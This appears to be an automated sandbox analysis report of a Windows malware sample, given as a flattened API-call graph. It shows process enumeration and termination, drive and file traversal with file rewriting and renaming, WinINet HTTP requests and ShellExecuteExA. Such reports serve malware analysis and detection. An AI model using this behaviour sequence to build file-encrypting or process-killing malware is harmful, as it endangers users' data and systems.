66 API calls 23075->23076 23077 42d654 23076->23077 23192 425a62 11 API calls __commit 23077->23192 23084 42cefb 23078->23084 23081 42d69f 23193 42d6c6 LeaveCriticalSection __unlock_fhandle 23081->23193 23083 42d65e __commit 23083->23067 23085 42cf22 23084->23085 23194 42eb60 23085->23194 23087 425a10 __invoke_watson 10 API calls 23090 42d62f __commit 23087->23090 23088 42cf7d 23219 425720 66 API calls __getptd_noexit 23088->23219 23093 42d64f 23090->23093 23097 42d685 23090->23097 23091 42cf3e 23091->23088 23099 42cfd8 23091->23099 23136 42d1ad 23091->23136 23092 42cf82 23094 42570d __commit 66 API calls 23092->23094 23095 42570d __commit 66 API calls 23093->23095 23098 42cf8c 23094->23098 23096 42d654 23095->23096 23281 425a62 11 API calls __commit 23096->23281 23101 42cefb __tsopen_nolock 120 API calls 23097->23101 23220 425a62 11 API calls __commit 23098->23220 23102 42d05f 23099->23102 23106 42d032 23099->23106 23104 42d69f 23101->23104 23221 425720 66 API calls __getptd_noexit 23102->23221 23282 42d6c6 LeaveCriticalSection __unlock_fhandle 23104->23282 23201 42dc3d 23106->23201 23108 42d064 23109 42570d __commit 66 API calls 23108->23109 23110 42d06e 23109->23110 23222 425a62 11 API calls __commit 23110->23222 23111 42d65e __commit 23111->23081 23114 42cf96 23114->23081 23115 42d0f0 23116 42d11a CreateFileW 23115->23116 23117 42d0f9 23115->23117 23119 42d1b7 GetFileType 23116->23119 23120 42d147 23116->23120 23223 425720 66 API calls __getptd_noexit 23117->23223 23122 42d1c4 GetLastError 23119->23122 23123 42d208 23119->23123 23124 42d180 GetLastError 23120->23124 23127 42d15b CreateFileW 23120->23127 23121 42d0fe 23125 42570d __commit 66 API calls 23121->23125 23225 425733 66 API calls 2 library calls 23122->23225 23226 42da07 67 API calls __commit 23123->23226 23224 425733 66 API calls 2 library calls 23124->23224 23129 42d108 23125->23129 23127->23119 23127->23124 23131 42570d __commit 66 API calls 23129->23131 23130 42d1ed CloseHandle 23132 42d1fb 23130->23132 23164 42d1a7 23130->23164 23131->23114 23134 42570d __commit 66 API calls 23132->23134 23137 42d200 23134->23137 23135 42570d __commit 66 API calls 23135->23136 23136->23087 23137->23164 23138 42d226 23139 42d51b 23138->23139 23140 42d27c 23138->23140 23144 42d2ec 23138->23144 23139->23136 23142 42d5a5 CloseHandle CreateFileW 23139->23142 23227 42ea30 68 API calls 2 library calls 23140->23227 23145 42d5d2 GetLastError 23142->23145 23146 42d4b1 23142->23146 23143 42d286 23147 42d2a8 23143->23147 23148 42d28f 23143->23148 23144->23139 23154 42d446 23144->23154 23165 42d396 23144->23165 23279 425733 66 API calls 2 library calls 23145->23279 23146->23136 23244 42e479 76 API calls 5 library calls 23147->23244 23228 425720 66 API calls __getptd_noexit 23148->23228 23152 42d5de 23280 42da88 67 API calls __commit 23152->23280 23153 42d294 23153->23144 23157 42d29c 23153->23157 23154->23139 23163 42d463 23154->23163 23169 42d3ba 23154->23169 23155 42d2b9 23159 42d2d3 23155->23159 23245 42e2c3 100 API calls 4 library calls 23155->23245 23229 42a01d 23157->23229 23158 42d401 23158->23157 23249 42e479 76 API calls 5 library calls 23158->23249 23159->23157 23246 42ea30 68 API calls 2 library calls 23159->23246 23250 42af27 68 API calls 2 library calls 23163->23250 23164->23135 23165->23139 23165->23158 23165->23169 23170 42d3e5 23165->23170 23168 42d46e 23168->23169 23172 42d479 23168->23172 23169->23139 23169->23157 23254 42b793 23169->23254 23247 42af27 68 API calls 2 library calls 23170->23247 23251 42af27 68 API calls 2 library calls 23172->23251 23174 42d4a4 23181 42a01d __close_nolock 69 API calls 23174->23181 23175 42d4be 23176 42d4e0 23175->23176 23183 42d4c5 23175->23183 23253 42ea30 68 API calls 2 library calls 23176->23253 23177 42d41b 23177->23157 23177->23174 23177->23175 23177->23176 23182 42d43d 23177->23182 23178 42d3f0 23178->23169 23185 42d3f7 23178->23185 23187 42d4ab 23181->23187 23182->23139 23252 42ea30 68 API calls 2 library calls 23183->23252 23248 42af27 68 API calls 2 library calls 23185->23248 23186 42d483 23186->23139 23186->23157 23191 42570d __commit 66 API calls 23187->23191 23188 42d4cf 23188->23157 23188->23182 23191->23146 23192->23083 23193->23083 23195 42eb81 23194->23195 23196 42eb6c 23194->23196 23195->23091 23197 42570d __commit 66 API calls 23196->23197 23198 42eb71 23197->23198 23283 425a62 11 API calls __commit 23198->23283 23200 42eb7c 23200->23091 23202 42dc49 __commit 23201->23202 23203 42a3f9 __mtinitlocknum 66 API calls 23202->23203 23204 42dc59 23203->23204 23205 42a4bb __lock 66 API calls 23204->23205 23206 42dc5e __commit 23204->23206 23216 42dc6d 23205->23216 23206->23115 23207 42ddaf 23295 42ddcd LeaveCriticalSection _doexit 23207->23295 23208 42dd45 23210 42bb56 __calloc_crt 66 API calls 23208->23210 23213 42dd4e 23210->23213 23211 42a4bb __lock 66 API calls 23211->23216 23212 42dced EnterCriticalSection 23214 42dcfd LeaveCriticalSection 23212->23214 23212->23216 23213->23207 23285 42db77 23213->23285 23214->23216 23215 42dcc3 InitializeCriticalSectionAndSpinCount 23215->23216 23216->23207 23216->23208 23216->23211 23216->23212 23216->23215 23284 42dd0f LeaveCriticalSection _doexit 23216->23284 23219->23092 23220->23114 23221->23108 23222->23114 23223->23121 23224->23164 23225->23130 23226->23138 23227->23143 23228->23153 23297 42db0e 23229->23297 23231 42a083 23310 42da88 67 API calls __commit 23231->23310 23233 42a02d 23233->23231 23234 42db0e __commit 66 API calls 23233->23234 23243 42a061 23233->23243 23238 42a058 23234->23238 23235 42db0e __commit 66 API calls 23239 42a06d CloseHandle 23235->23239 23236 42a0ad 23236->23164 23237 42a08b 23237->23236 23311 425733 66 API calls 2 library calls 23237->23311 23241 42db0e __commit 66 API calls 23238->23241 23239->23231 23242 42a079 GetLastError 23239->23242 23241->23243 23242->23231 23243->23231 23243->23235 23244->23155 23245->23159 23246->23153 23247->23178 23248->23158 23249->23177 23250->23168 23251->23186 23252->23188 23253->23186 23255 42b79f __commit 23254->23255 23256 42b7c2 23255->23256 23257 42b7a7 23255->23257 23259 42b7ce 23256->23259 23262 42b808 23256->23262 23380 425720 66 API calls __getptd_noexit 23257->23380 23381 425720 66 API calls __getptd_noexit 23259->23381 23260 42b7ac 23263 42570d __commit 66 API calls 23260->23263 23265 42db77 ___lock_fhandle 68 API calls 23262->23265 23272 42b7b4 __commit 23263->23272 23264 42b7d3 23266 42570d __commit 66 API calls 23264->23266 23268 42b80e 23265->23268 23267 42b7db 23266->23267 23382 425a62 11 API calls __commit 23267->23382 23270 42b830 23268->23270 23271 42b81c 23268->23271 23274 42570d __commit 66 API calls 23270->23274 23315 42b096 23271->23315 23272->23169 23276 42b835 23274->23276 23275 42b828 23384 42b85f LeaveCriticalSection __unlock_fhandle 23275->23384 23383 425720 66 API calls __getptd_noexit 23276->23383 23279->23152 23280->23146 23281->23111 23282->23111 23283->23200 23284->23216 23286 42db83 __commit 23285->23286 23287 42dbdd 23286->23287 23288 42a4bb __lock 66 API calls 23286->23288 23289 42dbe2 EnterCriticalSection 23287->23289 23292 42dbff __commit 23287->23292 23290 42dbaf 23288->23290 23289->23292 23291 42dbb8 InitializeCriticalSectionAndSpinCount 23290->23291 23293 42dbcb 23290->23293 23291->23293 23292->23207 23296 42dc0d LeaveCriticalSection _doexit 23293->23296 23295->23206 23296->23287 23298 42db33 23297->23298 23299 42db1b 23297->23299 23303 42db72 23298->23303 23313 425720 66 API calls __getptd_noexit 23298->23313 23312 425720 66 API calls __getptd_noexit 23299->23312 23301 42db20 23304 42570d __commit 66 API calls 23301->23304 23303->23233 23306 42db28 23304->23306 23305 42db44 23307 42570d __commit 66 API calls 23305->23307 23306->23233 23308 42db4c 23307->23308 23314 425a62 11 API calls __commit 23308->23314 23310->23237 23311->23236 23312->23301 23313->23305 23314->23306 23316 42b0a5 __write_nolock 23315->23316 23317 42b0fa 23316->23317 23318 42b0db 23316->23318 23351 42b0d0 23316->23351 23322 42b156 23317->23322 23323 42b139 23317->23323 23394 425720 66 API calls __getptd_noexit 23318->23394 23320 423ebb TranslatorGuardHandler 5 API calls 23321 42b791 23320->23321 23321->23275 23326 42b16c 23322->23326 23327 42b15d 23322->23327 23396 425720 66 API calls __getptd_noexit 23323->23396 23324 42b0e0 23328 42570d __commit 66 API calls 23324->23328 23385 42b8b0 23326->23385 23398 42af27 68 API calls 2 library calls 23327->23398 23331 42b0e7 23328->23331 23329 42b13e 23334 42570d __commit 66 API calls 23329->23334 23395 425a62 11 API calls __commit 23331->23395 23333 42b172 23337 42b414 23333->23337 23342 427576 __getptd 66 API calls 23333->23342 23338 42b146 23334->23338 23335 42b169 23335->23326 23340 42b423 23337->23340 23341 42b6c4 WriteFile 23337->23341 23397 425a62 11 API calls __commit 23338->23397 23343 42b4de 23340->23343 23353 42b436 23340->23353 23345 42b5b3 23341->23345 23346 42b6f7 GetLastError 23341->23346 23344 42b18d GetConsoleMode 23342->23344 23356 42b4eb 23343->23356 23360 42b5b8 23343->23360 23344->23337 23348 42b1b6 23344->23348 23349 42b3f6 23345->23349 23346->23349 23347 42b742 23347->23351 23354 42570d __commit 66 API calls 23347->23354 23348->23337 23350 42b1c6 GetConsoleCP 23348->23350 23349->23347 23349->23351 23355 42b715 23349->23355 23350->23349 23377 42b1e9 23350->23377 23351->23320 23352 42b480 WriteFile 23352->23346 23352->23353 23353->23347 23353->23349 23353->23352 23358 42b765 23354->23358 23361 42b720 23355->23361 23362 42b734 23355->23362 23356->23347 23357 42b55a WriteFile 23356->23357 23357->23346 23364 42b58e 23357->23364 23402 425720 66 API calls __getptd_noexit 23358->23402 23359 42b629 WideCharToMultiByte 23359->23346 23367 42b660 WriteFile 23359->23367 23360->23347 23360->23359 23366 42570d __commit 66 API calls 23361->23366 23401 425733 66 API calls 2 library calls 23362->23401 23364->23345 23364->23349 23364->23356 23368 42b725 23366->23368 23369 42b697 GetLastError 23367->23369 23372 42b68b 23367->23372 23400 425720 66 API calls __getptd_noexit 23368->23400 23369->23372 23372->23345 23372->23349 23372->23360 23372->23367 23373 42b295 WideCharToMultiByte 23373->23349 23375 42b2c6 WriteFile 23373->23375 23374 42bd1c 78 API calls __fassign 23374->23377 23375->23346 23376 42b2ed 23375->23376 23376->23346 23376->23349 23376->23377 23378 42deeb WriteConsoleW CreateFileW __write_nolock 23376->23378 23379 42b31a WriteFile 23376->23379 23377->23349 23377->23373 23377->23374 23377->23376 23399 42bd6e 76 API calls __isleadbyte_l 23377->23399 23378->23376 23379->23346 23379->23376 23380->23260 23381->23264 23382->23272 23383->23275 23384->23272 23386 42b8cc 23385->23386 23387 42b8bd 23385->23387 23389 42b8ea 23386->23389 23390 42570d __commit 66 API calls 23386->23390 23388 42570d __commit 66 API calls 23387->23388 23391 42b8c2 23388->23391 23389->23333 23392 42b8dd 23390->23392 23391->23333 23393 425a62 __commit 11 API calls 23392->23393 23393->23391 23394->23324 23395->23351 23396->23329 23397->23351 23398->23335 23399->23377 23400->23351 23401->23351 23402->23351 23404 429501 EnterCriticalSection 23403->23404 23405 4294df 23403->23405 23406 424d72 23404->23406 23405->23404 23407 4294e7 23405->23407 23406->22240 23440 429ff7 23406->23440 23408 42a4bb __lock 66 API calls 23407->23408 23408->23406 23410 429ff7 __flsbuf 66 API calls 23409->23410 23411 429cf1 23410->23411 23412 42b8b0 __flsbuf 66 API calls 23411->23412 23414 429cf7 __flsbuf 23412->23414 23413 424df6 23416 427979 23413->23416 23414->23413 23415 42bb11 __malloc_crt 66 API calls 23414->23415 23415->23413 23450 424509 23416->23450 23419 42570d __commit 66 API calls 23420 4279e5 23419->23420 23421 4279ef 23420->23421 23423 429ff7 __flsbuf 66 API calls 23420->23423 23430 427a26 __aulldvrm _fprintf _strlen 23420->23430 23422 42570d __commit 66 API calls 23421->23422 23424 4279f4 23422->23424 23423->23430 23458 425a62 11 API calls __commit 23424->23458 23426 4279ff 23427 423ebb TranslatorGuardHandler 5 API calls 23426->23427 23428 424e06 23427->23428 23448 429d7e 97 API calls __flush 23428->23448 23430->23421 23430->23426 23431 424005 _free 66 API calls 23430->23431 23432 428091 DecodePointer 23430->23432 23433 42bb11 __malloc_crt 66 API calls 23430->23433 23434 4280fa DecodePointer 23430->23434 23435 427917 97 API calls _fprintf 23430->23435 23436 42811b DecodePointer 23430->23436 23437 428581 97 API calls _fprintf 23430->23437 23438 42cc97 78 API calls __cftof 23430->23438 23459 42bd36 76 API calls _LocaleUpdate::_LocaleUpdate 23430->23459 23431->23430 23432->23430 23433->23430 23434->23430 23435->23430 23436->23430 23437->23430 23438->23430 23439->22246 23441 42a003 23440->23441 23442 42a018 23440->23442 23443 42570d __commit 66 API calls 23441->23443 23442->22250 23444 42a008 23443->23444 23462 425a62 11 API calls __commit 23444->23462 23446 42a013 23446->22250 23447->22240 23448->22242 23449->22246 23451 42451c 23450->23451 23457 424569 23450->23457 23452 427576 __getptd 66 API calls 23451->23452 23453 424521 23452->23453 23454 424549 23453->23454 23460 42734d 74 API calls 6 library calls 23453->23460 23454->23457 23461 426bcc 68 API calls 6 library calls 23454->23461 23457->23419 23458->23426 23459->23430 23460->23454 23461->23457 23462->23446 23464 424eb0 23463->23464 23467 424ec4 23463->23467 23465 42570d __commit 66 API calls 23464->23465 23468 424eb5 23465->23468 23466 424ec0 23480 424f78 LeaveCriticalSection LeaveCriticalSection _fprintf 23466->23480 23467->23466 23481 42a1ae 23467->23481 23514 425a62 11 API calls __commit 23468->23514 23474 429ff7 __flsbuf 66 API calls 23475 424ede 23474->23475 23491 42a0b9 23475->23491 23477 424ee4 23477->23466 23478 424005 _free 66 API calls 23477->23478 23478->23466 23479->22265 23480->22265 23482 424ed0 23481->23482 23483 42a1c7 23481->23483 23487 42a17d 23482->23487 23483->23482 23484 429ff7 __flsbuf 66 API calls 23483->23484 23485 42a1e2 23484->23485 23486 42b793 __write 97 API calls 23485->23486 23486->23482 23488 424ed8 23487->23488 23489 42a18d 23487->23489 23488->23474 23489->23488 23490 424005 _free 66 API calls 23489->23490 23490->23488 23492 42a0c5 __commit 23491->23492 23493 42a0cd 23492->23493 23496 42a0e8 23492->23496 23515 425720 66 API calls __getptd_noexit 23493->23515 23495 42a0f4 23516 425720 66 API calls __getptd_noexit 23495->23516 23496->23495 23501 42a12e 23496->23501 23497 42a0d2 23499 42570d __commit 66 API calls 23497->23499 23511 42a0da __commit 23499->23511 23500 42a0f9 23503 42570d __commit 66 API calls 23500->23503 23502 42db77 ___lock_fhandle 68 API calls 23501->23502 23504 42a134 23502->23504 23505 42a101 23503->23505 23506 42a142 23504->23506 23507 42a14e 23504->23507 23517 425a62 11 API calls __commit 23505->23517 23509 42a01d __close_nolock 69 API calls 23506->23509 23510 42570d __commit 66 API calls 23507->23510 23512 42a148 23509->23512 23510->23512 23511->23477 23518 42a175 LeaveCriticalSection __unlock_fhandle 23512->23518 23514->23466 23515->23497 23516->23500 23517->23511 23518->23511 23519->22293 23521 41e5bd _memset __write_nolock 23520->23521 23522 41e5e5 GetCurrentProcessId 23521->23522 23523 41e791 ExitThread 23522->23523 23527 41e601 _memset 23522->23527 23524 41e610 K32EnumProcesses 23524->23527 23525 41e776 Sleep 23525->23527 23526 41e66b OpenProcess 23526->23527 23528 41e74d CloseHandle 23526->23528 23527->23523 23527->23524 23527->23525 23527->23526 23529 41e696 K32GetProcessImageFileNameW 23527->23529 23595 424733 23527->23595 23528->23527 23529->23527 23532 41e6f0 wcsstr 23533 41e744 TerminateProcess 23532->23533 23534 41e705 wcsstr 23532->23534 23533->23528 23534->23533 23535 41e71a wcsstr 23534->23535 23535->23533 23536 41e72f wcsstr 23535->23536 23536->23528 23536->23533 23538 421aa0 68 API calls 23537->23538 23539 4137a9 23538->23539 23540 41397b ExitThread 23539->23540 23541 40eb90 _aullshr 23539->23541 23542 4137c7 GetLogicalDriveStringsW 23541->23542 23547 4137fb _memset 23542->23547 23543 41394e 23664 413670 71 API calls 2 library calls 23543->23664 23545 413954 23545->23540 23546 4139b0 131 API calls 23545->23546 23546->23545 23547->23543 23548 4138dd GetDriveTypeW 23547->23548 23549 4138f3 GetVolumeInformationW 23547->23549 23640 4139b0 23547->23640 23548->23547 23548->23549 23549->23547 23552 41a040 __write_nolock 23551->23552 23553 412640 67 API calls 23552->23553 23554 41a05a 23552->23554 23553->23554 23555 41a0a0 _memset 23554->23555 23758 41a560 23554->23758 23557 41a0ba InternetOpenA 23555->23557 23558 41a0e0 _memset 23557->23558 23559 41a0f3 _alldiv _alldiv 23558->23559 23770 41a650 23559->23770 23561 41f0c0 5 API calls 23567 41a1a7 _memset 23561->23567 23562 41f1b0 5 API calls 23562->23567 23563 40ea80 66 API calls 23563->23567 23564 412640 67 API calls 23564->23567 23565 41a650 97 API calls 23565->23567 23566 424005 _free 66 API calls 23566->23567 23567->23561 23567->23562 23567->23563 23567->23564 23567->23565 23567->23566 23568 41a3c0 InternetConnectA InternetSetCookieA 23567->23568 23569 41a3ac InternetConnectA 23567->23569 23570 41a3e9 HttpOpenRequestA 23568->23570 23569->23570 23773 42b910 23570->23773 23573 41a438 InternetReadFile strstr 23574 41a46b InternetCloseHandle InternetCloseHandle 23573->23574 23575 41a491 InternetCloseHandle 23573->23575 23574->23558 23574->23575 23576 41a549 ExitThread 23575->23576 23577 41a4a8 23575->23577 23578 424005 _free 66 API calls 23577->23578 23579 41a4b2 23578->23579 23580 40e7d0 66 API calls 23579->23580 23581 41a4c8 23579->23581 23580->23581 23581->23576 23583 41d3b7 _memset 23582->23583 23785 424e32 23583->23785 23586 424e32 _strcat_s 66 API calls 23588 41d3fe _memset 23586->23588 23587 41d436 ShellExecuteExA 23589 41d49d CloseHandle 23587->23589 23590 41d46f 23587->23590 23588->23587 23592 41d4b3 23589->23592 23593 41d4bc ExitThread 23589->23593 23591 41d480 GetLastError 23590->23591 23591->23589 23594 41d489 Sleep ShellExecuteExA 23591->23594 23592->23593 23594->23589 23594->23591 23598 424700 23595->23598 23599 424509 _LocaleUpdate::_LocaleUpdate 76 API calls 23598->23599 23600 424713 23599->23600 23603 424590 23600->23603 23604 4245c0 _wcsnlen 23603->23604 23605 4245ac 23603->23605 23604->23605 23608 4245d7 23604->23608 23606 42570d __commit 66 API calls 23605->23606 23607 4245b1 23606->23607 23636 425a62 11 API calls __commit 23607->23636 23613 4245bb 23608->23613 23637 42783a LCMapStringW _wcsnlen 23608->23637 23611 42461d 23614 424640 23611->23614 23615 424629 23611->23615 23612 423ebb TranslatorGuardHandler 5 API calls 23618 41e6db wcsstr 23612->23618 23613->23612 23617 424645 23614->23617 23626 424656 23614->23626 23616 42570d __commit 66 API calls 23615->23616 23619 42462e 23616->23619 23620 42570d __commit 66 API calls 23617->23620 23618->23532 23618->23533 23623 42570d __commit 66 API calls 23619->23623 23620->23607 23621 4246a1 23624 42570d __commit 66 API calls 23621->23624 23622 4246ae 23638 42783a LCMapStringW _wcsnlen 23622->23638 23623->23613 23624->23619 23627 424b82 _malloc 66 API calls 23626->23627 23629 424671 __crtLCMapStringA_stat 23626->23629 23627->23629 23628 4246c1 23630 4246c8 23628->23630 23631 4246d9 23628->23631 23629->23621 23629->23622 23633 424895 __wcsdup 66 API calls 23630->23633 23632 42570d __commit 66 API calls 23631->23632 23634 4246d2 23632->23634 23633->23634 23639 4244e9 66 API calls _free 23634->23639 23636->23613 23637->23611 23638->23628 23639->23613 23641 4139bd _memset __write_nolock 23640->23641 23642 424895 __wcsdup 66 API calls 23641->23642 23643 413a1b 23642->23643 23644 424820 __NMSG_WRITE 66 API calls 23643->23644 23645 413a34 FindFirstFileW 23644->23645 23646 413cf1 23645->23646 23662 413a5c 23645->23662 23647 423ebb TranslatorGuardHandler 5 API calls 23646->23647 23648 413cfe 23647->23648 23648->23547 23649 413cd4 FindNextFileW 23651 413cea FindClose 23649->23651 23649->23662 23650 424820 66 API calls __NMSG_WRITE 23650->23662 23651->23646 23653 424895 66 API calls __wcsdup 23653->23662 23654 424733 77 API calls 23655 413c7b wcsstr 23654->23655 23656 413c90 wcsstr 23655->23656 23655->23662 23658 413c9f wcsstr 23656->23658 23656->23662 23657 424005 _free 66 API calls 23657->23662 23658->23662 23661 4139b0 125 API calls 23661->23662 23662->23649 23662->23650 23662->23653 23662->23654 23662->23657 23662->23661 23665 4133e0 23662->23665 23690 4248f8 23662->23690 23698 414110 PathFindExtensionW 23662->23698 23700 413d10 23662->23700 23664->23545 23669 4133ed _memset __write_nolock 23665->23669 23666 413650 23667 423ebb TranslatorGuardHandler 5 API calls 23666->23667 23668 41365d 23667->23668 23668->23662 23669->23666 23670 424895 __wcsdup 66 API calls 23669->23670 23671 4134f1 23670->23671 23672 424820 __NMSG_WRITE 66 API calls 23671->23672 23673 413507 23672->23673 23674 424820 __NMSG_WRITE 66 API calls 23673->23674 23675 41351d 23674->23675 23676 424820 __NMSG_WRITE 66 API calls 23675->23676 23677 413533 CreateFileW 23676->23677 23677->23666 23678 413562 WriteFile FlushFileBuffers CloseHandle 23677->23678 23680 424895 __wcsdup 66 API calls 23678->23680 23681 4135b8 23680->23681 23682 424820 __NMSG_WRITE 66 API calls 23681->23682 23683 4135ce 23682->23683 23684 424820 __NMSG_WRITE 66 API calls 23683->23684 23685 4135e4 23684->23685 23686 424820 __NMSG_WRITE 66 API calls 23685->23686 23687 4135fa CreateFileW 23686->23687 23687->23666 23688 41361f WriteFile FlushFileBuffers CloseHandle 23687->23688 23688->23666 23691 424909 _wcslen 23690->23691 23694 424905 23690->23694 23741 4278bc 23691->23741 23694->23662 23695 424895 __wcsdup 66 API calls 23696 424931 23695->23696 23696->23694 23697 425a10 __invoke_watson 10 API calls 23696->23697 23697->23694 23699 414120 23698->23699 23699->23662 23701 413d1d _memset __write_nolock 23700->23701 23702 42441c __NMSG_WRITE 66 API calls 23701->23702 23703 413d99 23702->23703 23748 42474a 23703->23748 23706 413ee1 23708 423ebb TranslatorGuardHandler 5 API calls 23706->23708 23707 413dc4 23709 413dd3 CreateFileW 23707->23709 23710 413dc8 SetFileAttributesW 23707->23710 23711 413ef1 23708->23711 23709->23706 23712 413df4 GetFileSize 23709->23712 23710->23709 23711->23662 23713 413eda CloseHandle 23712->23713 23714 413e0d 23712->23714 23713->23706 23714->23713 23715 413e2e GetProcessHeap RtlAllocateHeap 23714->23715 23715->23713 23716 413e73 ReadFile 23715->23716 23717 413ec0 _memset 23716->23717 23718 413e99 CloseHandle GetProcessHeap HeapFree 23716->23718 23719 413ece GetProcessHeap HeapFree 23717->23719 23722 413f05 GetProcessHeap RtlAllocateHeap 23717->23722 23720 423ebb TranslatorGuardHandler 5 API calls 23718->23720 23719->23713 23721 413ebc 23720->23721 23721->23662 23722->23719 23723 413f24 23722->23723 23724 413f92 SetFilePointer WriteFile WriteFile 23723->23724 23725 413f5b GetProcessHeap HeapFree 23723->23725 23726 414001 WriteFile 23724->23726 23727 413fe7 GetProcessHeap HeapFree 23724->23727 23728 413f70 GetProcessHeap HeapFree CloseHandle 23725->23728 23726->23727 23729 414028 WriteFile 23726->23729 23727->23728 23730 423ebb TranslatorGuardHandler 5 API calls 23728->23730 23732 414054 GetProcessHeap HeapFree 23729->23732 23733 41406d FlushFileBuffers CloseHandle 23729->23733 23731 413f8e 23730->23731 23731->23662 23732->23728 23734 414080 MoveFileExW 23733->23734 23735 4140c5 GetProcessHeap HeapFree GetProcessHeap HeapFree 23734->23735 23736 41409a GetLastError 23734->23736 23739 423ebb TranslatorGuardHandler 5 API calls 23735->23739 23737 4140b4 Sleep 23736->23737 23738 4140a7 DeleteFileW 23736->23738 23737->23734 23737->23735 23738->23737 23740 414106 23739->23740 23740->23662 23742 42cac0 __calloc_crt 66 API calls 23741->23742 23743 4278d6 23742->23743 23744 42570d __commit 66 API calls 23743->23744 23747 42491e 23743->23747 23745 4278e9 23744->23745 23746 42570d __commit 66 API calls 23745->23746 23745->23747 23746->23747 23747->23694 23747->23695 23754 42475c 23748->23754 23749 42570d __commit 66 API calls 23751 42477c 23749->23751 23750 413db1 GetFileAttributesW 23750->23706 23750->23707 23757 425a62 11 API calls __commit 23751->23757 23752 424760 23752->23749 23752->23750 23754->23752 23755 4247ae 23754->23755 23755->23750 23756 42570d __commit 66 API calls 23755->23756 23756->23751 23757->23750 23759 42b910 _memset 23758->23759 23760 41a58f InternetOpenW InternetOpenUrlW 23759->23760 23761 41a5c4 InternetCloseHandle 23760->23761 23762 41a5db InternetReadFile 23760->23762 23764 423ebb TranslatorGuardHandler 5 API calls 23761->23764 23763 41a60c 23762->23763 23775 424b23 23763->23775 23766 41a5d7 23764->23766 23766->23555 23768 423ebb TranslatorGuardHandler 5 API calls 23769 41a63d 23768->23769 23769->23555 23771 424b03 __strftime_l 97 API calls 23770->23771 23772 41a66a 23771->23772 23772->23567 23774 41a41c HttpSendRequestA GetLastError 23773->23774 23774->23573 23774->23574 23776 424b31 23775->23776 23777 424b38 23775->23777 23776->23777 23779 424b56 23776->23779 23778 42570d __commit 66 API calls 23777->23778 23783 424b3d 23778->23783 23781 41a622 InternetCloseHandle InternetCloseHandle 23779->23781 23782 42570d __commit 66 API calls 23779->23782 23781->23768 23782->23783 23784 425a62 11 API calls __commit 23783->23784 23784->23781 23786 424e47 23785->23786 23789 424e40 23785->23789 23787 42570d __commit 66 API calls 23786->23787 23788 424e4c 23787->23788 23794 425a62 11 API calls __commit 23788->23794 23789->23786 23792 424e75 23789->23792 23791 41d3e8 23791->23586 23792->23791 23793 42570d __commit 66 API calls 23792->23793 23793->23788 23794->23791 23832 42f226 69 API calls 4 library calls 23837 429a00 6 API calls 3 library calls 23838 41e609 89 API calls _memset 21704 231b6a 16 API calls 23907 425b08 102 API calls 10 library calls 23840 401010 66 API calls ctype 23841 41b211 50 API calls 23909 42a512 68 API calls 2 library calls 21811 23107d 21812 23107f LoadLibraryA 21811->21812 21813 23108b 21812->21813 23913 23137c VirtualProtect 23914 411120 69 API calls TranslatorGuardHandler 23916 41e920 12 API calls TranslatorGuardHandler 21818 401d34 70 API calls 2 library calls 23796 401e3d 23797 401e42 23796->23797 23798 40ea80 66 API calls 23797->23798 23802 401e98 23798->23802 23799 401ee3 23800 412640 67 API calls 23799->23800 23801 401eff 23800->23801 23804 424296 66 API calls 23801->23804 23802->23799 23803 414cd0 69 API calls 23802->23803 23803->23799 23805 401f21 23804->23805 23806 424005 _free 66 API calls 23805->23806 23807 401f27 23806->23807 23808 424296 66 API calls 23807->23808 23809 401f50 23808->23809 23810 423ebb TranslatorGuardHandler 5 API calls 23809->23810 23811 40201f 23810->23811 23854 41ecc0 GetModuleHandleW GetProcAddress InterlockedExchange SetWindowLongW 21700 4273c6 RtlEncodePointer 21702 2321ab RtlExitUserThread 23923 231fa9 10 API calls 23924 4254e1 5 API calls ___security_init_cookie 23923->23924 23925 4273cf TlsAlloc 23856 42d8d0 RtlUnwind 21748 2313bb 21749 2313d6 21748->21749 21750 2313e8 VirtualProtect 21749->21750 21751 2313f4 21750->21751 23931 42dfe7 IsProcessorFeaturePresent 23862 23068b EnumWindows EnumWindows 23864 4268ee 67 API calls __calloc_crt 23933 4129ec _aullshr _memset 23936 419ff0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23937 41b7f4 12 API calls TranslatorGuardHandler 23942 427590 75 API calls 6 library calls 21707 231ff0 21708 231ff2 21707->21708 21717 2320b8 21708->21717 21710 232124 CreateThread 21712 232130 21710->21712 21733 4254e1 5 API calls ___security_init_cookie 21710->21733 21711 2320ab 21711->21710 21725 23216c 21712->21725 21714 23215a 21715 2321d8 RtlExitUserThread 21714->21715 21716 2321e4 21715->21716 21718 2320d5 21717->21718 21719 232124 CreateThread 21718->21719 21720 232130 21719->21720 21729 4254e1 21719->21729 21721 23216c RtlExitUserThread 21720->21721 21722 23215a 21721->21722 21723 2321d8 RtlExitUserThread 21722->21723 21724 2321e4 21723->21724 21724->21711 21726 232189 21725->21726 21727 2321d8 RtlExitUserThread 21726->21727 21728 2321e4 21727->21728 21728->21714 21732 42ae84 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 21729->21732 21731 4254e6 21731->21731 21732->21731 23876 2320f7 CreateThread RtlExitUserThread RtlExitUserThread 23877 4254e1 5 API calls ___security_init_cookie 23876->23877 23878 231af5 17 API calls 23880 231efa 12 API calls 23881 4254e1 5 API calls ___security_init_cookie 23880->23881 23944 2315fa VirtualProtect VirtualProtect 23883 41b668 22 API calls TranslatorGuardHandler 23946 42a9ae SetUnhandledExceptionFilter 23885 4294ad 107 API calls 3 library calls 23950 42edb9 73 API calls ___InternalCxxFrameHandler

                                                                                                                            Executed Functions

                                                                                                                            Function 0041B2C0 Relevance: 117.7, APIs: 43, Strings: 24, Instructions: 450libraryloadermemoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
